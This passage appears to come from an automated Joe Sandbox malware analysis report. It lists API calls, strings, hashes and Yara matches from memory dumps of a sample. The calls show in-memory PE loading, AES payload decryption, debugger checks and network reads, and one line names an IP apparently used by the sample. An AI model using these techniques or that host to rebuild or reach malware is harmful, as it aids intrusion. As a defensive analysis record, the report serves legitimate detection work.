                      • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 005FDEE1
                      • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 005FDF08
                      • GetNativeSystemInfo.KERNEL32(?), ref: 005FDF5F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.00000000005F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F9000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5f9000_file.jbxd
                      Similarity
                      • API ID: Open$InfoNativeSystem
                      • String ID:
                      • API String ID: 1247124224-0
                      • Opcode ID: 99a974dcb6bf27dde47257abbb1c4c8d39f2788c90d29e028ca4d410d00131f3
                      • Instruction ID: ad1476f2c5c2282c362c2931d9d67c2f7fe86fe6fcc2946cf25e7d8101d5fc6e
                      • Opcode Fuzzy Hash: 99a974dcb6bf27dde47257abbb1c4c8d39f2788c90d29e028ca4d410d00131f3
                      • Instruction Fuzzy Hash: 484109B240820EDEEB11DF10C849BEE3BB5FF15300F01042AEA8686950D37A5DA4DF9A

                      APIs
                      • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 005FDEE1
                      • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 005FDF08
                      • GetNativeSystemInfo.KERNEL32(?), ref: 005FDF5F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.00000000005F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F9000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5f9000_file.jbxd
                      Similarity
                      • API ID: Open$InfoNativeSystem
                      • String ID:
                      • API String ID: 1247124224-0
                      • Opcode ID: 8d5145920b299bdbc2fcea49e532ff566b9d8bc6e3552d7091990b7a8d8baa11
                      • Instruction ID: 7ff49915214ea4558b39e2a253be8f81a8418928b4701f4a7a97d2f26dbdea16
                      • Opcode Fuzzy Hash: 8d5145920b299bdbc2fcea49e532ff566b9d8bc6e3552d7091990b7a8d8baa11
                      • Instruction Fuzzy Hash: 2031D87244420EDEEF11DF50C849AEE3BBAFF15304F500426EE8696850D77A4DA4DFA9

                      APIs
                      • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 005FDEE1
                      • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 005FDF08
                      • GetNativeSystemInfo.KERNEL32(?), ref: 005FDF5F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.00000000005F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F9000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5f9000_file.jbxd
                      Similarity
                      • API ID: Open$InfoNativeSystem
                      • String ID:
                      • API String ID: 1247124224-0
                      • Opcode ID: 5d5b91864cb9276cb113890cbacfaebd6fa2527ed91718c67e7697e326b17e0f
                      • Instruction ID: 56ca791bd1b53b76480c9df48f689a8e0216f7f69c5d12f534088d6c27e32743
                      • Opcode Fuzzy Hash: 5d5b91864cb9276cb113890cbacfaebd6fa2527ed91718c67e7697e326b17e0f
                      • Instruction Fuzzy Hash: 3031D97144424E9EEF12DF50C848AEE3FB9FF05304F500466EA8686851D7794DA4DF99
                      Control-flow Graph (rendered graph not reproduced): basic blocks 413cb9-413d06, API call RtlAllocateHeap, internal calls 40d0dd, 412473, 4116b2
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID: 5(@
                      • API String ID: 1279760036-4133491027
                      • Opcode ID: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                      • Instruction ID: 6b8e07f77369cee0563c76895a616f9db891ca7c172fe53b45855655e8c042ba
                      • Opcode Fuzzy Hash: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                      • Instruction Fuzzy Hash: 10E0E5322002115BD6213F669C05BDB7A5C9B417A2F140137FC56F62D0EA6DCDC241ED
                      Control-flow Graph (rendered graph not reproduced): basic blocks 4940e0f-4940e2c, API call SetErrorMode (x2)
                      APIs
                      • SetErrorMode.KERNEL32(00000400,?,?,04940223,?,?), ref: 04940E19
                      • SetErrorMode.KERNEL32(00000000,?,?,04940223,?,?), ref: 04940E1E
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorMode
                      • String ID:
                      • API String ID: 2340568224-0
                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                      • Instruction ID: 98d9a3b77034ec0415020b3f8d752fb2f2c3dff89f97121a55313444d61b48f8
                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                      • Instruction Fuzzy Hash: 4FD0123114512877D7002A94DC0DBCE7B1CDF05B62F008021FB0DD9080C770964046E5
                      Control-flow Graph (rendered graph not reproduced): basic blocks 6faece-6faf6e, API call VirtualProtect, internal calls 6faefd, 6faf71
                      APIs
                      • VirtualProtect.KERNEL32(?), ref: 006FAF39
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.00000000006FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 006FA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_6fa000_file.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: 23c45fe4738b11b558767df128fdff7dc533d14942ae1a528c864618e046577b
                      • Instruction ID: 21b0c5f6829abb8639ab509c74a7bf5af8c24eaf6e767a05ae08d78cb29b200f
                      • Opcode Fuzzy Hash: 23c45fe4738b11b558767df128fdff7dc533d14942ae1a528c864618e046577b
                      • Instruction Fuzzy Hash: 6DF024B258D38A1BC302DE7049917AD7FA28FA2310F29849ED288CB983C5F95845C70B
                      Control-flow Graph (rendered graph not reproduced): basic blocks 6faf0d-6faf6e, API call VirtualProtect, internal call 6faf71
                      APIs
                      • VirtualProtect.KERNEL32(?), ref: 006FAF39
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.00000000006FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 006FA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_6fa000_file.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: 42f56b1b56f9fe8804907939f4970a14e9fcb030ec4af842714e272e3bd4803c
                      • Instruction ID: 7c6ab0c80675211da077dbfcace833f076c875cdd35f594b8b2c8757e19526f8
                      • Opcode Fuzzy Hash: 42f56b1b56f9fe8804907939f4970a14e9fcb030ec4af842714e272e3bd4803c
                      • Instruction Fuzzy Hash: 44F055B145054E5FC745EFB0C4012DE36A3AF54300F388028D2488BB11D5B218108B45
                      Control-flow Graph (rendered graph not reproduced): basic blocks 6faf2c-6faf6e, API call VirtualProtect, internal call 6faf71
                      APIs
                      • VirtualProtect.KERNEL32(?), ref: 006FAF39
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.00000000006FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 006FA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_6fa000_file.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: 5d884ca636a47930c94db905d205a4c19e5ee0c8c6018a2ca54a56ae715789ca
                      • Instruction ID: c9acd3d79f85354e092b78da7b354409db738658ff467f1a52a157cfab9cfe3c
                      • Opcode Fuzzy Hash: 5d884ca636a47930c94db905d205a4c19e5ee0c8c6018a2ca54a56ae715789ca
                      • Instruction Fuzzy Hash: 8CE026B294024A1FC768DE34C48179E36A3AF90301F78C028E1588BA45CAB868008B44
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.00000000005F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F9000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5f9000_file.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: c8acbaf9d1f0fdeeae18d027ca47e05cfe8310da61f7403f3d514fd56daddb4f
                      • Instruction ID: cf1e44a296bd45961cd0e42debf124495e94a721b9311fd2533768d20260c536
                      • Opcode Fuzzy Hash: c8acbaf9d1f0fdeeae18d027ca47e05cfe8310da61f7403f3d514fd56daddb4f
                      • Instruction Fuzzy Hash: C5D017B260C909CBC304AF28A445128FAA1BBC0274F229A3D82E586590E53800488B56
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 04798174
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453741215.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Offset: 04790000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4790000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                      • Instruction ID: 3a8a135cfd3c209053a50b5584947d4b1d8406fe23487f1b01be3a0bf574a5ba
                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                      • Instruction Fuzzy Hash: AF113C79A40208EFDB01DF98C985E98BBF5AF08350F058094F9489B361D371EA90DF81
                      APIs
                      • SetLastError.KERNEL32(0000000D), ref: 00402F02
                      • SetLastError.KERNEL32(000000C1), ref: 00402F44
                      Strings
                      • Size is not valid!, xrefs: 00402F08
                      • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402FB3
                      • DOS header is not valid!, xrefs: 00402F32
                      • DOS header size is not valid!, xrefs: 00402F71
                      • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402FA1
                      • ERROR_OUTOFMEMORY!, xrefs: 00403062
                      • alignedImageSize != AlignValueUp!, xrefs: 0040302C
                      • Section alignment invalid!, xrefs: 00402FC7
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast
                      • String ID: DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                      • API String ID: 1452528299-2436911586
                      • Opcode ID: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                      • Instruction ID: feefb59cb084f329bf9f2ee3fcaf904be4f7c95626e3fbc9d9f9d2488596d2a7
                      • Opcode Fuzzy Hash: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                      • Instruction Fuzzy Hash: C3F1AC71B00205ABCB10CF69D985BAAB7B4BF48705F14407AE909EB6C1D779ED11CB98
                      APIs
                      • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042C014), ref: 049438B7
                      • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 049438DB
                      • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04943945
                      • GetLastError.KERNEL32 ref: 0494394F
                      • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04943977
                      • GetLastError.KERNEL32 ref: 04943981
                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04943991
                      • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04943A53
                      • CryptDestroyKey.ADVAPI32(?), ref: 04943AC5
                      Strings
                      • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04943893
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                      • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                      • API String ID: 3761881897-63410773
                      • Opcode ID: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                      • Instruction ID: e28709bbd0167317d677ed61e52becdf7b2194bc70acfa8282d58d6545c7aa2a
                      • Opcode Fuzzy Hash: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                      • Instruction Fuzzy Hash: E6814071B002189FEF249F24CC45F9ABBB5EF89300F1481B9E94DA7291DB31AA858F55
                      APIs
                      • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,BBD3FB9F), ref: 00403650
                      • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403674
                      • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004036DE
                      • GetLastError.KERNEL32 ref: 004036E8
                      • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403710
                      • GetLastError.KERNEL32 ref: 0040371A
                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040372A
                      • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004037EC
                      • CryptDestroyKey.ADVAPI32(?), ref: 0040385E
                      Strings
                      • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040362C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                      • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                      • API String ID: 3761881897-63410773
                      • Opcode ID: d367fb143b6554c856abbd5ed66d5e96836dac5444f5810d3b21dde5d4a3622d
                      • Instruction ID: 2781db946ec69ebb5a82e2500c6cd73aae13b8bfd69ebbb4ddbc14150c00f762
                      • Opcode Fuzzy Hash: d367fb143b6554c856abbd5ed66d5e96836dac5444f5810d3b21dde5d4a3622d
                      • Instruction Fuzzy Hash: DF819F71A00218AFEF209F25CC45B9ABBB9FF49300F1481BAF50DA7291DB359E858F55
                      APIs
                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 00402AF8
                      • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402B0D
                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402B1B
                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402B36
                      • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402B55
                      • LocalFree.KERNEL32(00000000), ref: 00402B62
                      • LocalFree.KERNEL32(?), ref: 00402B67
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                      • String ID: %s: %s$Error protecting memory page
                      • API String ID: 839691724-1484484497
                      • Opcode ID: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                      • Instruction ID: 7115b4f99f47229cfead79ad45df677009e1c347b6b4b41756aa32ea0cb5f428
                      • Opcode Fuzzy Hash: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                      • Instruction Fuzzy Hash: A0311431B00104AFDB10DF58DD45FAAB7A8EF48704F4541BAE905EB2D2DB79AD06CB98
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: *!B9$,6D $1}o$3uL]$8?}w$OE=i$P:eb$T:wv$Y<}w$vR:m
                      • API String ID: 0-3713636289
                      • Opcode ID: 8cbc28ed8de87df63ace6162546383e27e074de4ccfa9dcb3954c13b02c506cb
                      • Instruction ID: 7ddfda5112d3122c76ed957839d0500e6aa471648f2b463047d5df0ab2e03d77
                      • Opcode Fuzzy Hash: 8cbc28ed8de87df63ace6162546383e27e074de4ccfa9dcb3954c13b02c506cb
                      • Instruction Fuzzy Hash: CCB228F3A082009FE304AE2DEC8567ABBE9EF94720F16493DEAC4D7744E93558058797
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: !!;_$2z9o$L>.k$[D~$g@s$j;s$ty7$,kz
                      • API String ID: 0-2819684213
                      • Opcode ID: e11fd2431256e82676e5be6e7533077cc1dd8ea359a4ec3c6f21440865ad7f19
                      • Instruction ID: 401927977823ab59119f4356e76d351182501e8fcb2b30f790cc70cb44e06456
                      • Opcode Fuzzy Hash: e11fd2431256e82676e5be6e7533077cc1dd8ea359a4ec3c6f21440865ad7f19
                      • Instruction Fuzzy Hash: D8B218F360C2009FE3046E2DEC8567AFBE5EF94720F1A4A3DEAC4C7744E63598458696
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      • Opcode ID: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
                      • Instruction ID: 4ec5cfcd79f9b81e0d104b8321146cba3f0ab1dc6500a030f703b9c7425dc3b2
                      • Opcode Fuzzy Hash: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
                      • Instruction Fuzzy Hash: E8D21671E092288FDB65CE28DD807EAB7B5EB44305F1441EAD80DE7240E778AEC58F85
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: jh/$rRmf$u4M}${u~$.a$JP?
                      • API String ID: 0-4165264580
                      • Opcode ID: 0f180957aa9e1bd24fb475f1446e4ba66d662b948fc3832cfa9653c766499041
                      • Instruction ID: 25af535ebe7738b204bfcc4dd829a68d4f6f6c35c42b4e76d730a6a5333164a0
                      • Opcode Fuzzy Hash: 0f180957aa9e1bd24fb475f1446e4ba66d662b948fc3832cfa9653c766499041
                      • Instruction Fuzzy Hash: 99B24BF3A0C210AFE3046E2DEC8567ABBE9EFD4320F16463DEAC4D7744E97558018696
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: :;$EO_~$N*z~$bZ_$cMA$}t
                      • API String ID: 0-1237312033
                      • Opcode ID: 3af1170236a865c3d8e69ead3c0a8421f40a9a28eb407c9edda324ddeadca1ae
                      • Instruction ID: 4036bdfc4b3afedb513670a9aceacfc9061a317f12cad092c86ba730643e3944
                      • Opcode Fuzzy Hash: 3af1170236a865c3d8e69ead3c0a8421f40a9a28eb407c9edda324ddeadca1ae
                      • Instruction Fuzzy Hash: 92B2E4F39086009FE704AE29EC8567AFBE5EF94320F16893DEAC5C3744E63598058797
                      APIs
                      • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401A05
                      • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401A28
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileInternet$PointerRead
                      • String ID: text
                      • API String ID: 3197321146-999008199
                      • Opcode ID: 0d5891a278ce307004780994f853f58be742df4ecfdd0caad83694c416481f12
                      • Instruction ID: 56e9ac6e571947bcf275884445d614b5348a2aaf1a2f7cc802118cd3fea156c2
                      • Opcode Fuzzy Hash: 0d5891a278ce307004780994f853f58be742df4ecfdd0caad83694c416481f12
                      • Instruction Fuzzy Hash: 10C13970A002189FDB24DF54CC85BE9B7B5EF49304F1041EAE409B72A1DB78AE95CF99
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: @1m$Ga.$t{x${d_:$o!x
                      • API String ID: 0-206620874
                      • Opcode ID: c852ce34cbf66b7ef6b3d64234e1d1f9c2bed5f8170a5dfbe8dee22f6cde63fc
                      • Instruction ID: e26cd71369b4747b3d987c7ab686c049c32ced022980fa447a5a790683bf80fd
                      • Opcode Fuzzy Hash: c852ce34cbf66b7ef6b3d64234e1d1f9c2bed5f8170a5dfbe8dee22f6cde63fc
                      • Instruction Fuzzy Hash: 5EB217F3A082149FE3046E2DEC8567AFBE5EF94720F1A493DEAC4C3744EA7558018697
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction ID: 819956c8da69d9361fbf4e47ff42106ad8a36c3f0c6e400b1e605b299af52eb5
                      • Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction Fuzzy Hash: 3B022B71E012199FDB14CFA8C980BAEBBB5FF88314F248669D919EB350D731A945CB90
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction ID: 78ffdd1b1e8fbf681df67024148688f8aa54f57810aac3ba8850cddb3c6bfb2a
                      • Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction Fuzzy Hash: 87024D71E002199BDF14CFA9D9806EEBBB1FF48314F24826AE519E7340D775A981CB94
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0494A7FD
                      • IsDebuggerPresent.KERNEL32 ref: 0494A8C9
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0494A8E9
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0494A8F3
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                      • String ID:
                      • API String ID: 254469556-0
                      • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction ID: 94c94a44b135ae989381e55fd8a71094e507e145c67eccc9764a277a8ef2010e
                      • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction Fuzzy Hash: C1312975D4521CDBDB10DFA4D989BCDBBB8BF48304F1040AAE50DAB250EB71AA85CF44
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0040A596
                      • IsDebuggerPresent.KERNEL32 ref: 0040A662
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A682
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0040A68C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                      • String ID:
                      • API String ID: 254469556-0
                      • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction ID: e2fd69841e347503e8527ce1becac27b78df2bbd7224e42b4cf7edbda655d181
                      • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction Fuzzy Hash: 04313A75D4131CDBDB10DFA5D989BCDBBB8BF08304F1080AAE408A7290EB759E858F49
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: 6c/~$P[4$zo
                      • API String ID: 0-2902303802
                      • Opcode ID: 75d36f11c497d9db264ac8b4c4aaf01d63c7bbf1fde5253cfe70d6d84021ad9e
                      • Instruction ID: 6e756c19e1edbf748455dfeacac8efaf4f0676359de3a18dc94ff4d51af373e1
                      • Opcode Fuzzy Hash: 75d36f11c497d9db264ac8b4c4aaf01d63c7bbf1fde5253cfe70d6d84021ad9e
                      • Instruction Fuzzy Hash: AFB2E5F360C204AFE3046E2DEC8567AF7E9EF94720F1A493DEAC5C3744EA3558058696
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,04942AA0), ref: 0494D142
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04942AA0), ref: 0494D14C
                      • UnhandledExceptionFilter.KERNEL32(0494277A,?,?,?,?,?,04942AA0), ref: 0494D159
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                      • Instruction ID: 21efebb5599d5716e685dac3d0bd9a8c9b414818c4671e61e10afad7f7c4e334
                      • Opcode Fuzzy Hash: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                      • Instruction Fuzzy Hash: 9331A7759112289BCB61DF64DC89BDDBBB8BF48310F5041EAE81CA7260E770AF858F44
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040CEDB
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040CEE5
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040CEF2
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                      • Instruction ID: c8210cab332152a7f303cacbc0cae8b9100ca1fc91568f2564f16f954c9570b7
                      • Opcode Fuzzy Hash: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
